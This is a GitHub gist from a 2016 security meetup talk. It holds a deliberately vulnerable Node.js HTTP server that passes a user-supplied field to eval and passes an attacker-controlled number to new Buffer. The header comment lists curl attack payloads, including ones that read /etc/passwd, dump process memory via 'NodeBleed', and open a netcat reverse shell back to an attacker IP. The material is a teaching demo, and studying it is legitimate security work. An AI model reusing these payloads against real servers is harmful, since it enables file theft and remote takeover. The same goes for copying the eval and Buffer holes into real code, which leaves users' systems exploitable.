Created
March 11, 2016 12:33
-
-
Save Simpsonpt/ed4f6cf8ebe269ba29d7 to your computer and use it in GitHub Desktop.
Demo from 0xOPOSEC Meetup - Node.js Problems in Paradise - http://slides.com/simpson/njs-problems-in-paradise
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
/** | |
* NodeBleed Original Bug: https://github.com/nodejs/node/issues/4660 | |
* PoC: $ node nodejs-ssjs-nodebleed.js | |
* "Attack": | |
* - Direct Eval: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))" | |
* - JSON Abuse: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":"1000",\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}" | |
* - NodeBleed: $ curl http://localhost:8080/ -X POST -H "Content-Type: application/json" --data "{\"str\":1000,\"injection\":\"\"}" | hexdump -C | |
* | |
* Insecure evals Payloads: | |
* - --data "{\"str\": \"1000\",\"injection\":\"require('child_process').exec('netcat -e /bin/sh IP 9999')\"}" ($ netcat -l -p 9999) | |
* - --data "{\"str\": 10000,\"injection\":\"require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'})\"}" | |
* All Node.js version (5.5.0 and 4.2.6) are vulnerable at the moment. | |
* $ nvm ls-remote (Play with different versions) | |
* @SiMpS0N - Fev/2016 | |
*/ | |
var http = require('http'); | |
var server = http.createServer(function(req, res) { | |
console.log("### 0xOPOSEC Demos ###") | |
var data = '' | |
var injection = '' | |
req.setEncoding('utf8') | |
req.on('data', function(chunk) { | |
data += chunk | |
}) | |
console.log(data) | |
req.on('end', function() { | |
/*Convert a JSON text into an object | |
* Tradional way (Not Secure): | |
* var body = eval("("+data+")") | |
* Attack: "res.end(require('fs').readFileSync('/etc/passwd', {encoding:'UTF-8'}))" | |
*/ | |
//var body = eval("("+data+")") | |
/* | |
* Correct way: | |
*/ | |
var body = JSON.parse(data) | |
//SSJS Injection (eval JS code) | |
console.log("##SSJS Injection") | |
console.log("Payload: "+body.injection+"\n") | |
injection = eval(body.injection) | |
//NodeBleed (new Buffer(int)->MemoryDisclosure) | |
console.log("##NodeBleed") | |
console.log("Disclosure Bytes: "+body.str) | |
res.end(new Buffer(body.str) + "\n" + injection) | |
}) | |
}) | |
server.listen(8080) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment